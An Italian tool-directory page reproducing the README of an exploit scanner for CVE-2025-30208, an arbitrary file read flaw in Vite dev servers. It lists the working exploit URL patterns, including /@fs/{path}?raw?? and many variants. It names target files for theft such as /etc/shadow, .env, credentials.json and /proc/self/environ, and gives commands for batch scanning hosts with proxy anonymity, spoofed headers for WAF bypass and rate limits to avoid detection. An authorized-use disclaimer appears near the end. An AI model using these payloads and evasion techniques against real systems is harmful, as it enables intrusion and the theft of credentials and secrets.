Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-30208 — CVE‑2025‑30208 è una vulnerabilità di lettura arbitraria di file di gravità media nel server di sviluppo Vite (un popolare strumento di build per frontend) | Kitploit
Strumenti/GitHubGitHub/th-secforge/cve-2025-30208
RicognizioneScanner di VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubth-secforge/cve-2025-30208

CVE-2025-30208

CVE‑2025‑30208 è una vulnerabilità di lettura arbitraria di file di gravità media nel server di sviluppo Vite (un popolare strumento di build per frontend)

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🔥 Scanner per vulnerabilità di lettura arbitraria di file CVE-2025-30208 per Vite

Python License Security Status Modular

Scanner avanzato per CVE-2025-30208 con funzionalità di livello enterprise

Strumento professionale di penetration testing per il rilevamento della vulnerabilità di lettura arbitraria di file in Vite

🚀 Avvio rapido • 📋 Caratteristiche • 🔧 Utilizzo • 📊 Esempi • 🛡️ Sicurezza


📖 Panoramica

Questo è uno scanner completo per vulnerabilità progettato per rilevare e sfruttare la CVE-2025-30208 nei server di sviluppo Vite. La vulnerabilità consente la lettura arbitraria di file attraverso gli endpoint del file system di Vite, esponendo potenzialmente file di configurazione sensibili, codice sorgente e informazioni di sistema.

🎯 Cosa fa questo strumento

  • Rileva istanze vulnerabili di Vite attraverso la rete
  • Sfrutta la vulnerabilità di lettura arbitraria di file in modo sicuro
  • Scopre file sensibili e dati di configurazione
  • Segnala risultati in diversi formati (HTML, JSON, Console)
  • Gestisce sessioni e configurazioni di scansione
  • Gestisce gli errori con meccanismi automatici di ripetizione

🏗️ Architettura modulare

Lo strumento ora presenta un'architettura modulare per una migliore manutenibilità ed estensibilità:

  • CVE-2025-30208.py - Applicazione principale dello scanner
  • payloads.py - Payload di sfruttamento avanzati (60+ varianti)
  • sensitive_files.py - Database completo di file sensibili (200+ file)
  • html_template.py - Template di reporting HTML migliorato in stile hacker

🚀 Avvio rapido

Prerequisiti

root@kitploit:~
pip3 install -r requirements.txt

Utilizzo base

root@kitploit:~
python3 CVE-2025-30208.py

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run

📋 Caratteristiche

🔍 Rilevamento principale della vulnerabilità

  • 60+ Payload avanzati: Tecniche di sfruttamento complete per il massimo rilevamento
  • Rilevamento intelligente: Analisi intelligente delle risposte per evitare falsi positivi
  • Validazione in tempo reale: Validazione continua delle risposte del target
  • Test completi: Testa tutti gli endpoint vulnerabili noti

🛡️ Caratteristiche di sicurezza avanzate

  • Supporto proxy: Configurazione proxy HTTP/HTTPS per l'anonimato
  • Header personalizzati: Bypass WAF/IPS con header HTTP personalizzati
  • Limitazione della velocità: Ritardi configurabili per evitare il rilevamento
  • Gestione delle sessioni: Salva e ripristina sessioni di scansione
  • Validazione input: Validazione completa dei parametri

🔧 Capacità avanzate

  • Scansione batch: Scansione multi-thread di più target
  • Scoperta di file sensibili: Scoperta automatica di 200+ file sensibili
  • Test di connettività: Test dei protocolli TCP/UDP/HTTP/HTTPS
  • Recupero errori: Ripetizione automatica con backoff esponenziale
  • Logging completo: Log dettagliati con timestamp

📊 Reporting e output

  • 🎨 Report HTML migliorati: Bellissimi report di vulnerabilità in stile hacker con animazioni
  • Esportazione JSON: Dati strutturati per ulteriori analisi
  • Output su console: Feedback in tempo reale con colori
  • File di log: Audit trail dettagliati
  • Interfaccia web interattiva: Server web integrato per visualizzare i report

🔧 Guida all'utilizzo

1. Configurazione base

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd

CVE-2025-30208 > test

2. Test della vulnerabilità

root@kitploit:~
CVE-2025-30208 > run

# Abilita la modalità verbose per output dettagliato
CVE-2025-30208 > verbose
CVE-2025-30208 > run

3. Scansione batch

root@kitploit:~
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch

192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Premi Invio due volte per terminare]

4. Scoperta di file sensibili

root@kitploit:~
CVE-2025-30208 > scan

5. Configurazione avanzata

root@kitploit:~
# Configura proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080

# Imposta header personalizzati
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}

# Configura limitazione della velocità
CVE-2025-30208 > rate
Enter rate limit: 1.0

6. Reporting HTML migliorato

root@kitploit:~
# Genera un bellissimo report HTML
CVE-2025-30208 > pull

# Avvia il server web per visualizzare il report
CVE-2025-30208 > web

# Avvia il server web su una porta specifica
CVE-2025-30208 > web 8081

# Ferma il server web
CVE-2025-30208 > web off

📊 Riferimento comandi


⚙️ Opzioni di configurazione


🎨 Sistema di payload migliorato

Lo scanner ora utilizza 60+ diverse varianti di payload organizzate in payloads.py:

Payload @fs primari

root@kitploit:~
/@fs/{percorso_file}?raw??
/@fs/{percorso_file}?raw&url
/@fs/{percorso_file}?import&raw??
/@fs/{percorso_file}?raw&import
/@fs/{percorso_file}?import&url

Variazioni di parametri estese

root@kitploit:~
/@fs/{percorso_file}?raw&source
/@fs/{percorso_file}?raw&content
/@fs/{percorso_file}?raw&data
/@fs/{percorso_file}?raw&file
/@fs/{percorso_file}?raw&type=text
/@fs/{percorso_file}?raw&format=text
/@fs/{percorso_file}?raw&encoding=utf8

Variazioni specifiche di Vite

root@kitploit:~
/@fs/{percorso_file}?raw&vite&dev
/@fs/{percorso_file}?raw&vite&hot
/@fs/{percorso_file}?raw&vite&hmr
/@fs/{percorso_file}?raw&development
/@fs/{percorso_file}?raw&debug

Variazioni del sistema modulare

root@kitploit:~
/@fs/{percorso_file}?raw&esm
/@fs/{percorso_file}?raw&cjs
/@fs/{percorso_file}?raw&umd
/@fs/{percorso_file}?raw&js
/@fs/{percorso_file}?raw&ts
/@fs/{percorso_file}?raw&json
/@fs/{percorso_file}?raw&css
/@fs/{percorso_file}?raw&html

Endpoint alternativi

root@kitploit:~
/app/{percorso_file}?raw??
/App/{percorso_file}?raw??

🔍 Scoperta di file sensibili migliorata

Lo strumento ora testa 200+ file sensibili organizzati in sensitive_files.py:

🖥️ File di sistema (Linux/Unix)

  • /etc/passwd - Informazioni sugli account utente
  • /etc/shadow - Dati password crittografate
  • /etc/services - Servizi di rete
  • /etc/hosts - Mappatura hostname
  • /etc/fstab - Tabella del file system
  • /etc/ssh/sshd_config - Configurazione server SSH
  • /etc/crontab - Cron job di sistema
  • /etc/sudoers - Configurazione sudo

📊 Informazioni di processo

  • /proc/version - Versione del kernel
  • /proc/cpuinfo - Informazioni sulla CPU
  • /proc/meminfo - Informazioni sulla memoria
  • /proc/self/environ - Ambiente di processo
  • /proc/self/cmdline - Riga di comando del processo
  • /proc/net/tcp - Connessioni TCP
  • /proc/net/udp - Connessioni UDP

⚙️ Configurazione applicazione

  • .env - Variabili d'ambiente
  • .env.local - Ambiente locale
  • .env.production - Ambiente di produzione
  • config.json - Configurazione applicazione
  • settings.json - Impostazioni applicazione
  • application.properties - Configurazione Spring
  • application.yml - Configurazione YAML
  • database.yml - Configurazione database
  • secrets.json - Gestione segreti

📦 File Node.js / JavaScript

  • package.json - Dipendenze Node.js
  • package-lock.json - Dipendenze bloccate
  • yarn.lock - File lock Yarn
  • vite.config.js - Configurazione Vite
  • vite.config.ts - Configurazione Vite TypeScript
  • tsconfig.json - Configurazione TypeScript
  • webpack.config.js - Configurazione Webpack
  • next.config.js - Configurazione Next.js
  • nuxt.config.js - Configurazione Nuxt.js
  • angular.json - Configurazione Angular
  • vue.config.js - Configurazione Vue.js
  • rollup.config.js - Configurazione Rollup
  • eslint.config.js - Configurazione ESLint

🔧 File Git

  • .git/config - Configurazione Git
  • .gitignore - Regole ignore Git
  • .gitattributes - Attributi Git
  • .gitmodules - Sottomoduli Git
  • .git/HEAD - Branch corrente
  • .git/logs/HEAD - Log Git
  • .git/refs/heads/master - Branch master
  • .git/refs/heads/main - Branch main

📚 File di documentazione

  • README.md - Documentazione del progetto
  • CHANGELOG.md - Registro modifiche
  • LICENSE - Informazioni sulla licenza
  • CONTRIBUTING.md - Linee guida per contributi
  • AUTHORS - Informazioni sugli autori
  • TODO.md - Lista delle cose da fare
  • ROADMAP.md - Roadmap di sviluppo

🐳 File Docker

  • Dockerfile - Configurazione Docker
  • docker-compose.yml - Docker Compose
  • docker-compose.override.yml - Configurazione override
  • .dockerignore - Regole ignore Docker
  • docker-compose.prod.yml - Configurazione produzione
  • docker-compose.dev.yml - Configurazione sviluppo

🌐 Configurazione server web

  • nginx.conf - Configurazione Nginx
  • apache2.conf - Configurazione Apache
  • httpd.conf - Configurazione HTTP daemon
  • .htaccess - Controllo accessi Apache
  • web.config - Configurazione IIS
  • robots.txt - Direttive per motori di ricerca
  • sitemap.xml - Struttura del sito
  • manifest.json - Manifest dell'app web
  • sw.js - Service worker
  • firebase.json - Configurazione Firebase
  • firebase.rules - Regole di sicurezza Firebase

🪟 File Windows

  • boot.ini - Configurazione di avvio
  • autoexec.bat - Script di esecuzione automatica
  • system.ini - Configurazione di sistema
  • win.ini - Configurazione Windows
  • Users - Directory utenti
  • Windows - File di sistema
  • Program Files - Directory applicazioni

🍎 File macOS

  • System - File di sistema
  • Library - File libreria
  • Applications - File applicazioni
  • private/etc/hosts - File hosts
  • private/etc/passwd - Account utente

🗄️ File database

  • database.db - Database SQLite
  • database.sqlite - Database SQLite
  • data.db - Database dati
  • dump.sql - Dump del database
  • schema.sql - Schema del database
  • migrations - Migrazioni del database

📝 File di log

  • logs - Directory log
  • error.log - Log errori
  • access.log - Log accessi
  • app.log - Log applicazione
  • debug.log - Log debug
  • combined.log - Log combinati

💾 File di backup

  • backup - Directory backup
  • backup.sql - Backup database
  • backup.zip - Backup compresso
  • dump - Dump dati
  • export - Esportazione dati

🔒 Sicurezza e autenticazione

  • auth.json - Configurazione autenticazione
  • credentials.json - Archivio credenziali
  • keys.json - Gestione chiavi
  • tokens.json - Archivio token
  • jwt.json - Configurazione JWT
  • oauth.json - Configurazione OAuth

🔌 File API e servizi

  • api.json - Configurazione API
  • swagger.json - Documentazione API
  • openapi.json - Specifica OpenAPI
  • graphql.json - Configurazione GraphQL
  • schema.json - Schema API

☁️ File cloud e distribuzione

  • cloudformation.yml - AWS CloudFormation
  • serverless.yml - Configurazione Serverless
  • terraform.tf - Configurazione Terraform
  • kubernetes.yml - Configurazione Kubernetes
  • k8s.yml - Configurazione Kubernetes

📊 Monitoraggio e analisi

  • analytics.json - Configurazione analisi
  • monitoring.json - Impostazione monitoraggio
  • metrics.json - Configurazione metriche
  • telemetry.json - Dati telemetria

🎨 Reporting HTML migliorato

Lo strumento ora genera bellissimi report HTML in stile hacker con:

✨ Caratteristiche visive

  • Sfondo in stile Matrix con caratteri animati che cadono
  • Animazioni gradient ed effetti luminosi
  • Elementi interattivi con effetti hover
  • Design responsivo per tutti i dispositivi
  • Tema scuro ottimizzato per professionisti della sicurezza

📊 Statistiche interattive

  • Contatori in tempo reale per totale perdite e byte esposti
  • Indicatori di gravità con codifica a colori
  • Funzionalità di copia per ogni perdita
  • Anteprima del contenuto con dimensione e numero di righe
  • Sezioni espandibili per analisi dettagliata

🔧 Caratteristiche tecniche

  • Integrazione Google Fonts (JetBrains Mono, Orbitron)
  • Animazioni CSS e transizioni
  • Interattività JavaScript per UX migliorata
  • Design mobile-responsive
  • Compatibilità cross-browser

🌐 Integrazione server web

  • Server HTTP integrato per visualizzare i report
  • Apertura automatica del browser
  • Opzioni di configurazione porta
  • Comandi facili avvio/arresto

🛡️ Gestione errori e recupero

Meccanismo di ripetizione automatica

  • 3 Tentativi di ripetizione: Le richieste fallite vengono automaticamente ripetute
  • Backoff esponenziale: Ritardi crescenti tra i tentativi
  • Classificazione intelligente degli errori: Gestione diversa per diversi tipi di errore
  • Recupero graduale: Lo strumento continua a funzionare dopo gli errori

Categorie di errore

  • NetworkError: Problemi di connessione, timeout, proxy
  • ConfigurationError: Impostazioni e parametri non validi
  • ValidationError: Parametri di input non validi
  • ScannerError: Errori generali dello scanner

Funzionalità di validazione

  • Validazione input in tempo reale: Tutti i parametri validati prima dell'uso
  • Validazione configurazione: Validazione completa prima della scansione
  • Test di connettività: Test dei protocolli TCP/UDP/HTTP/HTTPS
  • Validazione proxy: Validazione formato URL proxy

📁 File di output


📝 Versioni interessate

🚨 Versioni vulnerabili

root@kitploit:~
6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9

✅ Versioni non vulnerabili

root@kitploit:~
Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0

🛡️ Sicurezza e utilizzo etico

⚠️ Note importanti sulla sicurezza

  • Solo test autorizzati: Utilizzare solo su sistemi di cui si è proprietari o per i quali si ha esplicito permesso di test
  • Divulgazione responsabile: Segnalare le vulnerabilità ai proprietari dei sistemi
  • Limitazione della velocità: Utilizzare ritardi appropriati per non sovraccaricare i target
  • Utilizzo di proxy: Considerare l'uso di proxy per l'anonimato quando appropriato
  • Conformità legale: Assicurarsi di rispettare le leggi e i regolamenti locali

🔒 Buone pratiche

  • Ottenere sempre autorizzazione scritta prima di testare
  • Utilizzare solo in ambienti controllati
  • Documentare tutte le attività di test
  • Rispettare i limiti di velocità e le risorse di sistema
  • Segnalare i risultati in modo responsabile

🚀 Esempi di utilizzo avanzato

Esempio 1: Scansione di rete completa

root@kitploit:~
CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch

Esempio 2: Scansione stealth con proxy

root@kitploit:~
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run

Esempio 3: Flusso di reporting avanzato

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080

Esempio 4: Scoperta di file sensibili

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan

🏗️ Struttura del progetto

root@kitploit:~
CVE-2025-30208/
├── CVE-2025-30208.py          # Applicazione principale dello scanner
├── payloads.py                # Payload di sfruttamento avanzati (60+)
├── sensitive_files.py         # Database di file sensibili (200+)
├── html_template.py           # Template di reporting HTML migliorato
├── README.md                  # Questa documentazione
├── requirements.txt           # Dipendenze Python
├── logs/                      # Directory file di log
├── data_leak.html            # Report HTML generati
├── data_leak.json            # Report JSON generati
└── session.json              # Configurazioni sessione salvate

🤝 Contribuire

Accogliamo con favore i contributi per migliorare questo strumento:

  1. Forka il repository
  2. Crea un branch per la funzionalità
  3. Apporta le tue modifiche
  4. Testa a fondo
  5. Invia una richiesta pull

Aree di contributo

  • Nuove varianti di payload in payloads.py
  • Modelli aggiuntivi di file sensibili in sensitive_files.py
  • Template HTML migliorati in html_template.py
  • Migliore gestione degli errori
  • Ottimizzazioni delle prestazioni
  • Miglioramenti alla documentazione

📄 Licenza

Questo progetto è concesso in licenza per scopi educativi e di test di sicurezza autorizzati esclusivamente.

⚠️ Disclaimer legale: Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e scopi di ricerca. Gli utenti sono responsabili di assicurarsi di avere la corretta autorizzazione prima di testare qualsiasi sistema. Gli autori non sono responsabili per qualsiasi uso improprio di questo strumento.


👨‍💻 Autore

ThemeHackers

GitHub

Ricercatore di sicurezza e penetration tester


⭐ Se questo strumento ti è stato utile, lascia una stella! ⭐

Realizzato con ❤️ per la community della sicurezza

Scarica lo strumento
ComandoDescrizioneEsempio
set <opzione> <valore>Imposta opzioni di configurazioneset RHOST 192.168.1.100
show optionsMostra le impostazioni correntishow options
editEditor interattivo delle opzioniedit
run / exploitEsegui test di vulnerabilitàrun
batchScansione batch di più targetbatch
scanScopri file sensibiliscan
pullEsporta risultati in HTML/JSONpull
web [on|off|porta]Server web per report HTMLweb 8080
saveSalva configurazione della sessionesave
loadCarica configurazione della sessioneload
testTesta la connettività al targettest
validateValida la configurazione correntevalidate
verboseAttiva/disattiva modalità verboseverbose
proxyConfigura impostazioni proxyproxy
headersImposta header HTTP personalizzatiheaders
rateConfigura limitazione della velocitàrate
logMostra informazioni di loglog
help / ?Mostra aiutohelp
exit / quitEsci dallo strumentoexit
OpzioneDescrizionePredefinitoValidazione
RHOSTIndirizzo host/IP del target-Validazione hostname/IP
RPORTNumero porta del target-Intervallo porte (1-65535)
FILEPATHPercorso file da testareetc/passwdValidazione percorso
PROXYURL proxy HTTP/HTTPS-Validazione formato URL
VERBOSEAbilita output verbosefalseValidazione booleana
RATE_LIMITRitardo tra le richieste (secondi)0.3Validazione numerica
THREADSNumero di thread per scansione batch5Validazione intera
TIMEOUTTimeout richiesta (secondi)5Validazione intera
CUSTOM_HEADERSHeader HTTP personalizzati (JSON){}Validazione formato JSON
  • prettier.config.js - Configurazione Prettier
  • jest.config.js - Configurazione Jest
  • babel.config.js - Configurazione Babel
  • tailwind.config.js - Configurazione Tailwind CSS
  • FileDescrizioneFormato
    data_leak.htmlReport vulnerabilità HTML migliorato in stile hackerHTML
    data_leak.jsonEsportazione JSON strutturataJSON
    sensitive_files_discovery.jsonFile sensibili scopertiJSON
    session.jsonConfigurazione sessione salvataJSON
    logs/cve_2025_30208_YYYYMMDD_HHMMSS.logLog di audit dettagliatiTesto